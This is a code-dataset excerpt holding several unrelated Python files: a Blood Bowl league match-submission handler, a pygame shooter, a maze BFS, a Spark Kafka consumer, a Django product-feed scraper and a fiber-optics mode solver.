Allow one\n # violation for journeyman hire, which is impossible to track otherwise.\n violation_set = set()\n for player, player_record in zip(players, player_records):\n if not player.team:\n # journeyman / star player\n continue\n\n if player.matches == 0 and player_record.is_empty():\n # a journeyman/necro/nurgle hire that may have acquired SPP in-game\n continue\n\n if player.team.key() not in team_map:\n assert player_record.is_empty()\n # Unfortunately BB assigns a journeyman/necro/nurgle hire an arbitrary id\n # that may conflict with an existing OFTL player from a different team.\n # In this case, player.matches != 0. This code is a safety net.\n continue\n\n # this check is to make sure we only do this once (for idempotence) in case\n # of a retry\n if player.playerrecord_set.count() > player.matches:\n\n # OFTL rule checks\n if not assert_log.check(player_record.spp, player.spp,\n \"%s %s (%s) expected spp\" % (\n player.team.key().name(), player.name, player.key().name())):\n\n # allow one violation for a journeyman hire before setting the\n # inconsistent flag\n if player.spp != 0 or (player.team.key() in violation_set):\n team_map[player.team.key()].set_flag(TeamProfile.INCONSISTENT_FLAG)\n\n violation_set.add(player.team.key())\n\n tv_delta = player.update(player_record)\n if tv_delta:\n team_map[player.team.key()].tv += tv_delta\n\n put_list.extend(coach_stats_list)\n put_list.extend(teams)\n put_list.extend(players)\n batch_put(put_list)\n\n # Update Race Statistics\n #--------------------------------------------------------------------#\n update_race_statistics(teams, team_records)\n \n # Update leader information\n #--------------------------------------------------------------------#\n\n update_coach_leaders(coach_stats_list)\n update_team_leaders(teams)\n update_player_leaders(players)\n\n # Update tournament details\n #--------------------------------------------------------------------#\n\n match_up = match_lookup.tournamentmatchup_set.get() \n\n # disqualify team if played match outside of tournament\n for team in teams:\n active_membership = team.get_active_tournament_membership()\n if active_membership and (not match_up or\n match_up.parent().key() != active_membership.parent().key()):\n\n active_tournament = active_membership.parent()\n if active_tournament.started:\n mail.send_mail(\n sender=\"verification@bb-oftl-hrd.appspotmail.com\",\n to=\"balderasfam@gmail.com\",\n subject=\"OFTL rules violation\",\n body=\"%s played outside of %s\\n\" % (\n team.key().name(), active_tournament.key().name()))\n else:\n # force withdraw\n active_membership.delete()\n\n # there can only be one tournament for this match\n if match_up:\n tournament = match_up.parent()\n\n # determine the winner\n if team_records[0].result == 0:\n # decide the winner by a 'coin flip'. 
Seed the random number generator by\n # the match key to make it deterministic in case we need to retry\n random.seed(str(match.key()))\n winner_index = random.choice([0, 1])\n else:\n winner_index = 0 if team_records[0].result == 1 else 1\n\n winner = teams[winner_index]\n winner = winner.tournamentmembership_set.ancestor(tournament).get()\n\n loser = teams[winner_index ^ 1]\n loser = loser.tournamentmembership_set.ancestor(tournament).get()\n\n if match_up.advance(winner, loser, match):\n update_team_leaders([winner.team])\n\n views.TournamentBox.clear(tournament.key())\n views.Tournaments.clear()\n \n # Evict relevant pages from memcache so they are regenerated\n #--------------------------------------------------------------------#\n\n for team in teams:\n views.TeamBox.clear(team.key())\n\n for player in players:\n views.PlayerBox.clear(player.key())\n\n views.RecentMatches.clear()\n views.LeagueStandings.clear()\n views.TeamLeaders.clear()\n views.PlayerLeaders.clear()\n views.CoachLeaders.clear()\n views.GeneralStatistics.clear()\n\n assert_log.mail()\n logging.debug(\"update successful for %s\" % match_lookup.get_string())\n\ndef update_race_statistics(teams, team_records):\n # If two teams of same race are playing against each other then\n # we have to run race_stats.update(team_record) twice, once for each\n # team. THEN we can queue the put.\n \n put_list = []\n\n if (teams[0].race == teams[1].race):\n race_stats = RaceStats.all().filter(\"race =\", team.race).get()\n for team, team_record in zip(teams, team_records):\n race_stats.update(team_record)\n put_list.append(race_stats)\n else:\n for team, team_record in zip(teams, team_records):\n race_stats = RaceStats.all().filter(\"race =\", team.race).get()\n race_stats.update(team_record)\n put_list.append(race_stats)\n\n batch_put(put_list)\n \ndef update_coach_leaders(coach_stats_list):\n \"\"\"Update coach leader standings\"\"\"\n put_list = []\n\n # update leader standings for each Coach\n for leader in CoachLeader.all():\n for coach_stats in coach_stats_list:\n put_list.append(CoachLeaderStanding(\n key_name = coach_stats.parent().key().name(),\n parent = leader,\n coach_stats = coach_stats,\n score = leader.get_score(coach_stats)))\n\n batch_put(put_list)\n \ndef update_team_leaders(teams):\n \"\"\"Update team leader standings\"\"\"\n put_list = []\n\n # update leader standings for each team\n for leader in TeamLeader.all():\n for team in teams:\n if team.matches == 0:\n # pre-registered team\n continue\n\n put_list.append(TeamLeaderStanding(\n key_name = team.key().name(),\n parent = leader,\n team = team,\n score = leader.get_score(team)))\n\n batch_put(put_list)\n\n\ndef update_player_leaders(players):\n \"\"\"Update player leader standings\"\"\"\n put_list = []\n\n # update leader standings for each player\n for leader in PlayerLeader.all():\n for player in players:\n if not player.key().name() or player.played == 0:\n # omit journeymen/star players and players that have not played\n continue\n\n put_list.append(PlayerLeaderStanding(\n key_name = player.key().name(),\n parent = leader,\n player = player,\n score = leader.get_score(player)))\n\n batch_put(put_list)\n\n\ndef get_color(num):\n if num>55:\n num=55\n\t\n color_map = {\n 0: (85 , 209, 255),\n 1: (112, 254, 202),\n 2: (151, 246, 14 ),\n 3: (246, 255, 0 ),\n 4: (241, 186, 138),\n 5: (255, 123, 246),\n 6: (224, 104, 254),\n 7: (223, 229, 229),\n 8: (85 , 169, 255),\n 9: (0 , 255, 252),\n 10: (0 , 255, 0 ),\n 11: (255, 222, 0 ),\n 12: (255, 147, 147),\n 13: (255, 
85 , 243),\n 14: (180, 123, 255),\n 15: (192, 191, 191),\n 16: (8 , 130, 255),\n 17: (3 , 219, 216),\n 18: (107, 221, 14 ),\n 19: (239, 189, 16 ),\n 20: (255, 83 , 83 ),\n 21: (246, 0 , 229),\n 22: (158, 85 , 255),\n 23: (170, 170, 170),\n 24: (20 , 60 , 212),\n 25: (2 , 168, 166),\n 26: (95 , 200, 9 ),\n 27: (204, 117, 41 ),\n 28: (244, 0 , 0 ),\n 29: (158, 0 , 147),\n 30: (106, 0 , 246),\n 31: (109, 109, 109),\n 32: (38 , 77 , 176),\n 33: (1 , 108, 107),\n 34: (77 , 111, 3 ),\n 35: (140, 78 , 29 ),\n 36: (180, 0 , 0 ),\n 37: (90 , 0 , 84 ),\n 38: (68 , 0 , 158),\n 39: (62 , 62 , 62 ),\n 40: (37 , 61 , 121),\n 41: (1 , 78 , 64 ),\n 42: (40 , 74 , 7 ),\n 43: (90 , 55 , 25 ),\n 44: (128, 0 , 0 ),\n 45: (54 , 37 , 78 ),\n 46: (48 , 4 , 105),\n 47: (24 , 24 , 24 ),\n 48: (21 , 35 , 69 ),\n 49: (1 , 45 , 37 ),\n 50: (27 , 50 , 5 ),\n 51: (52 , 29 , 9 ),\n 52: (74 , 0 , 0 ),\n 53: (31 , 21 , 45 ),\n 54: (28 , 2 , 60 ),\n 55: (14 , 14 , 14 ),\n }\n\n def get_two_char_hex_string(val):\n s = str(hex(val))[2:4]\n if len(s) == 1:\n s = \"0\" + s\n return s\n\n return '#' + \"\".join(get_two_char_hex_string(val) for val in color_map[num])\n\n\ndef get_logo(logo):\n logo = \"logo_%s.png\" % logo.lower()\n logos = open(\"./logos.txt\")\n for line in logos:\n if line.strip() == logo:\n break\n else:\n logo = \"logo_neutre_07.png\"\n logos.close()\n return logo\n\n\n", "repo_name": "midnjerry/bb-oftl-hrd", "sub_path": "grappl/submit.py", "file_name": "submit.py", "file_ext": "py", "file_size_in_byte": 24670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.debug", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 73, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.run_in_transaction", "line_number": 74, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 74, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 79, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 86, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue.add", "line_number": 89, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue", "line_number": 89, "usage_type": "name"}, {"api_name": "misc.AssertLog", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 115, "usage_type": "call"}, {"api_name": "misc.AssertLog", "line_number": 135, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 159, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 159, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 159, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 160, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 160, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 160, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 166, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 166, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 166, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 173, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 173, "usage_type": "attribute"}, {"api_name": 
"google.appengine.ext.db", "line_number": 173, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 321, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 379, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 380, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 393, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.put", "line_number": 394, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 394, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 397, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 409, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue.add", "line_number": 413, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue", "line_number": 413, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 422, "usage_type": "call"}, {"api_name": "misc.AssertLog", "line_number": 424, "usage_type": "call"}, {"api_name": "misc.get_ofl_season_and_week", "line_number": 425, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 442, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 442, "usage_type": "attribute"}, {"api_name": "grappl.utils.batch_put", "line_number": 521, "usage_type": "call"}, {"api_name": "google.appengine.api.mail.send_mail", "line_number": 547, "usage_type": "call"}, {"api_name": "google.appengine.api.mail", "line_number": 547, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 565, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 566, "usage_type": "call"}, {"api_name": "views.TournamentBox.clear", "line_number": 579, "usage_type": "call"}, {"api_name": "views.TournamentBox", "line_number": 579, "usage_type": "attribute"}, {"api_name": "views.Tournaments.clear", "line_number": 580, "usage_type": "call"}, {"api_name": "views.Tournaments", "line_number": 580, "usage_type": "attribute"}, {"api_name": "views.TeamBox.clear", "line_number": 586, "usage_type": "call"}, {"api_name": "views.TeamBox", "line_number": 586, "usage_type": "attribute"}, {"api_name": "views.PlayerBox.clear", "line_number": 589, "usage_type": "call"}, {"api_name": "views.PlayerBox", "line_number": 589, "usage_type": "attribute"}, {"api_name": "views.RecentMatches.clear", "line_number": 591, "usage_type": "call"}, {"api_name": "views.RecentMatches", "line_number": 591, "usage_type": "attribute"}, {"api_name": "views.LeagueStandings.clear", "line_number": 592, "usage_type": "call"}, {"api_name": "views.LeagueStandings", "line_number": 592, "usage_type": "attribute"}, {"api_name": "views.TeamLeaders.clear", "line_number": 593, "usage_type": "call"}, {"api_name": "views.TeamLeaders", "line_number": 593, "usage_type": "attribute"}, {"api_name": "views.PlayerLeaders.clear", "line_number": 594, "usage_type": "call"}, {"api_name": "views.PlayerLeaders", "line_number": 594, "usage_type": "attribute"}, {"api_name": "views.CoachLeaders.clear", "line_number": 595, "usage_type": "call"}, {"api_name": "views.CoachLeaders", "line_number": 595, "usage_type": "attribute"}, {"api_name": "views.GeneralStatistics.clear", "line_number": 596, "usage_type": "call"}, {"api_name": "views.GeneralStatistics", "line_number": 596, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 599, 
"usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 619, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 634, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 653, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 673, "usage_type": "call"}]} +{"seq_id": "34414766495", "text": "import pygame\nimport os,sys\nimport Player\nimport pBullet\nimport Level\npygame.init()\n\nSCREENHEIGHT = 480\nSCREENWIDTH = 640\nscreen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT))\npygame.display.set_caption(\"Bullets\")\npygame.key.set_repeat(100,100)\nbackground = pygame.Surface(screen.get_size())\nbackground = background.convert()\nlevels = [Level.Level(\"A8B4C4D6\",650,SCREENHEIGHT,SCREENWIDTH,1),Level.Level(\"C4A2B3D1D2D3D4D5\",1100,SCREENHEIGHT,SCREENWIDTH,2)]\nactivelevel = 0\n#player = Player.Player(310,240,30,30,(0,0,255))\n#fbullet = pygame.sprite.Group()\nlastFiring = 0\nclock = pygame.time.Clock()\nwon = False\nscore = [0]\nscorefont = pygame.font.Font(None,40)\n\ndone = False\nwhile not done:\n if pygame.event.peek():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_LSHIFT:\n levels[activelevel].player.focus(True)\n if event.key == pygame.K_UP:\n levels[activelevel].player.moveV(-6)\n if event.key == pygame.K_DOWN:\n levels[activelevel].player.moveV(6)\n if event.key == pygame.K_RIGHT:\n levels[activelevel].player.moveH(6)\n if event.key == pygame.K_LEFT:\n levels[activelevel].player.moveH(-6)\n elif event.type == pygame.KEYUP:\n if not pygame.key.get_pressed()[pygame.K_UP] and not pygame.key.get_pressed()[pygame.K_DOWN]:\n levels[activelevel].player.moveV(0)\n if not pygame.key.get_pressed()[pygame.K_RIGHT] and not pygame.key.get_pressed()[pygame.K_LEFT]:\n levels[activelevel].player.moveH(0)\n if event.key == pygame.K_LSHIFT:\n levels[activelevel].player.focus(False)\n \n if pygame.key.get_pressed()[pygame.K_SPACE] and lastFiring > 200:\n bullet = levels[activelevel].player.shoot()\n levels[activelevel].collective.add(bullet)\n levels[activelevel].fbullet.add(bullet)\n lastFiring = 0\n background.fill(levels[activelevel].levelcolor)\n levels[activelevel].draw(background)\n screen.blit(background,(0,0))\n \n screen.blit(scorefont.render(\"Score \" + str(score[0]),0,(0,0,0)),(SCREENWIDTH/2-20,0))\n \n if levels[activelevel].update(score):\n activelevel += 1\n if activelevel >= len(levels):\n done = True\n won = True\n \n clock.tick(30)\n lastFiring += clock.get_time()\n \n #drawnRects.draw(background)\n \n pygame.display.flip()\n\n#endloop\nwhile won:\n \n if pygame.event.peek():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n won = False;\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n won = False\n background.fill((255,255,255))\n screen.blit(background,(0,0))\n screen.blit(scorefont.render(\"Your final score was \" + str(score[0]),1,(0,0,0)),(SCREENWIDTH/2-150,SCREENHEIGHT/2 -60))\n screen.blit(scorefont.render(\"YOU WIN!\",1,(0,0,0)),(SCREENWIDTH/2-100,0))\n screen.blit(scorefont.render(\"Press ESC to end\", 1,(0,0,0)),(SCREENWIDTH/2-100,400))\n pygame.display.flip()\n\n\npygame.quit()\n ", "repo_name": "montepy/PyBullet", "sub_path": "PyBulletPrimaryTesting/PyBulletPrimaryTesting/PyBulletPrimaryTesting.py", "file_name": "PyBulletPrimaryTesting.py", "file_ext": "py", "file_size_in_byte": 3436, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 13, "usage_type": "call"}, {"api_name": "Level.Level", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.event.peek", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.event.peek", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 81, "usage_type": 
"attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "24674712233", "text": "import collections\r\nwall, clear, goal = 0, 1, 9 \r\nwidth,height=map(int,input().split())\r\n\r\ndef bfs(maze, start):\r\n queue = collections.deque()\r\n queue.append(start)\r\n seen = set([start])\r\n while queue:\r\n path = queue.popleft()\r\n print(path)\r\n x, y = path\r\n if maze[y][x] == goal:\r\n # print(maze[y][x])\r\n return True\r\n for x2, y2 in ((x+1,y), (x-1,y), (x,y+1), (x,y-1)):\r\n if ( 0 <= x2 < width and \r\n 0 <= y2 < height and \r\n maze[y2][x2] != wall and \r\n (x2, y2) not in seen): \r\n queue.append( (x2, y2))\r\n seen.add((x2, y2))\r\n return False\r\n\r\nmat=[list(map(int,input().split())) for i in range(height)]\r\n\r\nans = 0 if mat[0][0]==0 else bfs(mat,(0,0)) #check if start(0,0) is walkable or not if not return False else Run BFS\r\nprint(ans) #if path exist it will print True else prints False\r\n\r\n\r\n", "repo_name": "Rahul-p28/AI_LAB", "sub_path": "maze.py", "file_name": "maze.py", "file_ext": "py", "file_size_in_byte": 951, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "24753402838", "text": "from pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\n\nsc = SparkContext(appName=\"PythonSparkStreamingKafka\")\nsc.setLogLevel(\"WARN\")\n\nssc = StreamingContext(sc, 10)\ndirectKafkaStream = KafkaUtils.createDirectStream(ssc, [\"quickstart-events\"], {\"metadata.broker.list\": \"192.168.33.13:9092\"})\n\ndirectKafkaStream.map(lambda x: x[1]).pprint()\n\n\n#Starting Spark context\nssc.start()\nssc.awaitTermination()\n", "repo_name": "Manal-98/Data-mining", "sub_path": "spark-streaming-kafka.py", "file_name": "spark-streaming-kafka.py", "file_ext": "py", "file_size_in_byte": 473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.SparkContext", "line_number": 5, "usage_type": "call"}, {"api_name": "pyspark.streaming.StreamingContext", "line_number": 8, "usage_type": "call"}, {"api_name": "pyspark.streaming.kafka.KafkaUtils.createDirectStream", "line_number": 9, "usage_type": "call"}, {"api_name": "pyspark.streaming.kafka.KafkaUtils", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "26323773735", "text": "import requests\nfrom bs4 import BeautifulSoup\nfrom decimal import Decimal\nimport html\nfrom assistant.models import Product, Photo, Category\nfrom assistant.utils import get_file_ext, make_filename, get_and_save_image\nfrom currency.models import Currency\n\n\nclass ProductTemplate:\n\n def __init__(self, title, price, images, text, vendor_id, currency_id, available):\n self.title = title\n self.price = price\n self.images = images\n self.text = text\n self.vendor_id = vendor_id\n self.currency_id = currency_id\n self.available = available\n\n\nclass BaseHandler:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/70.0.3538.77 
Safari/537.36'}\n category = Category.objects.get(title='TEST CATEGORY')\n\n def __init__(self, sourse):\n self.sourse = sourse\n self.content = None\n self.products = []\n self._set_currencies()\n self.vendor_name = sourse.rules['vandor_name'].lower()\n\n def _set_currencies(self):\n self.currencies = {i.code.upper(): i.id for i in Currency.objects.all()}\n\n def download_content(self):\n r = requests.get(self.sourse.url, headers=self.headers)\n if r.status_code == 200:\n self.content = r.text\n else:\n print('[ERROR] response status: {}'.format(r.status_code))\n\n def prepare_content(self):\n raise NotImplementedError()\n\n @staticmethod\n def decimal_or_none(digit_text):\n try:\n return Decimal(digit_text)\n except:\n return None\n\n @staticmethod\n def _download_image(path, product_pk):\n ext = get_file_ext(path)\n filename = make_filename(product_pk, ext)\n get_and_save_image(path, filename)\n return filename\n\n @staticmethod\n def _update_product(product, product_in_db):\n product_in_db.availability_prom = '+' if product.available else '-'\n product_in_db.active = product.available or False\n product_in_db.price = product.price\n product_in_db.save(update_fields=('availability_prom', 'price', 'active'))\n\n def _create_product(self, product):\n new_product = Product()\n new_product.category = self.category\n new_product.title = product.title\n new_product.price = product.price\n new_product.text = product.text\n new_product.vendor_id = product.vendor_id\n new_product.vendor_name = self.vendor_name\n new_product.currency_id = product.currency_id\n new_product.availability_prom = '+' if product.available else '-'\n new_product.active = product.available\n try:\n new_product.image = self._download_image(product.images[0], new_product.pk)\n except IndexError:\n pass\n new_product.save()\n\n try:\n for i in product.images[1:]:\n image = Photo()\n image.product = new_product\n image.image = self._download_image(i, new_product.pk)\n image.save()\n except IndexError:\n pass\n\n def create_or_update(self):\n for product in self.products:\n products_in_db = Product.objects.filter(\n vendor_id=product.vendor_id,\n vendor_name=self.vendor_name\n )\n if len(products_in_db) > 0:\n for product_in_db in products_in_db:\n self._update_product(product, product_in_db)\n else:\n self._create_product(product)\n\n def parse(self):\n print('[INFO] Parsing {}'.format(self.vendor_name))\n self.download_content()\n\n if self.content:\n self.prepare_content()\n else:\n print('[ERROR] Content is None in {}'.format(self.vendor_name))\n return False\n\n self.create_or_update()\n\n\nclass YMLYandexCatalogHandler(BaseHandler):\n\n def prepare_content(self):\n soup = BeautifulSoup(self.content, 'html5lib')\n mapping = self.sourse.rules['mapping']\n reset_currency = self.sourse.rules.get('reset_currency_code', False)\n\n for offer in soup.find_all(self.sourse.rules['cycle_tag']):\n try:\n product = ProductTemplate(\n title=html.unescape(offer.find(mapping['get_title']).text),\n price=self.decimal_or_none(offer.find(mapping['get_price']).text),\n images=[i.text for i in offer.find_all(mapping['get_image'])],\n text=html.unescape(offer.find(mapping['get_text']).text),\n vendor_id=offer.find(mapping['get_vendor_code']).text,\n currency_id=self.currencies.get(reset_currency.upper()) if reset_currency else self.currencies.get(\n offer.find(mapping['get_currency']).text.upper()),\n available=True if offer[mapping['get_available']] == 'true' else False,\n )\n self.products.append(product)\n except:\n print('[ERROR] Parsing 
error in VitanHandler')\n", "repo_name": "vintkor/django_ppf", "sub_path": "spider/utils/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 5132, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "assistant.models.Category.objects.get", "line_number": 25, "usage_type": "call"}, {"api_name": "assistant.models.Category.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "assistant.models.Category", "line_number": 25, "usage_type": "name"}, {"api_name": "currency.models.Currency.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "currency.models.Currency.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "currency.models.Currency", "line_number": 35, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 50, "usage_type": "call"}, {"api_name": "assistant.utils.get_file_ext", "line_number": 56, "usage_type": "call"}, {"api_name": "assistant.utils.make_filename", "line_number": 57, "usage_type": "call"}, {"api_name": "assistant.utils.get_and_save_image", "line_number": 58, "usage_type": "call"}, {"api_name": "assistant.models.Product", "line_number": 69, "usage_type": "call"}, {"api_name": "assistant.models.Photo", "line_number": 87, "usage_type": "call"}, {"api_name": "assistant.models.Product.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "assistant.models.Product.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "assistant.models.Product", "line_number": 96, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 122, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 129, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "5107361753", "text": "import numpy as np\nfrom fiber import fiber\nfrom stretchmesh import stretchmesh\nfrom scipy.special import jv, kv\nfrom scipy.optimize import fsolve\nfrom contourmode import contour\n\nnco = 2.5\nncl = 1.5\nr = 0.3\nwl = 1\nside = 0.2\n\ndx = 0.002\ndy = 0.002\n\nx, y, eps = fiber([nco, ncl], [r], side, dx, dy)\nx, y = stretchmesh(x, y, [96, 0, 96, 0], [4, 1, 4, 1])\n\nV = 2 * np.pi * r / wl * np.sqrt(nco**2 - ncl**2)\n\n\ndef spam(U):\n return nco ** 2 * jv(1, U) / (U * jv(0, U)) + \\\n ncl ** 2 * kv(1, np.sqrt(V ** 2 - U ** 2)) / \\\n (np.sqrt(V ** 2 - U ** 2) * kv(0, np.sqrt(V ** 2 - U ** 2)))\n\n\nU = fsolve(spam, 3.2).item()\n\nW = np.sqrt(V**2 - U**2)\nneff0 = np.sqrt(nco**2 - (U / (2 * np.pi * r / wl))**2)\n\n\nx = x.reshape(-1, 1)\ny = y.reshape(1, -1)\nrho = np.sqrt(np.dot(x**2, np.ones(y.shape)) + np.dot(np.ones(x.shape), y**2))\n\nsinphi = np.divide(np.dot(np.ones(x.shape), y), rho)\ncosphi = np.divide(np.dot(x, np.ones(y.shape)), rho)\n\nHx0 = np.zeros(rho.shape)\nHy0 = np.zeros(rho.shape)\n\nfor index, value in np.ndenumerate(rho):\n if value == 0:\n Hx0[index] = 0\n Hy0[index] = 0\n elif value < r:\n Hx0[index] = -sinphi[index] * jv(1, U * value / r) / jv(1, U)\n Hy0[index] = cosphi[index] * jv(1, U * value / r) / jv(1, U)\n elif value > r:\n Hx0[index] = -sinphi[index] * kv(1, W * value / r) / kv(1, W)\n Hy0[index] = cosphi[index] * kv(1, W * value / r) / kv(1, W)\n\nhxmax = np.amax(abs(Hx0))\nhymax = np.amax(abs(Hy0))\nHx0 = Hx0 / max(hxmax, hymax)\nHy0 = Hy0 / max(hxmax, hymax)\n\nx = x.flatten()\ny = y.flatten()\n", "repo_name": "alikaikai/myfdm", 
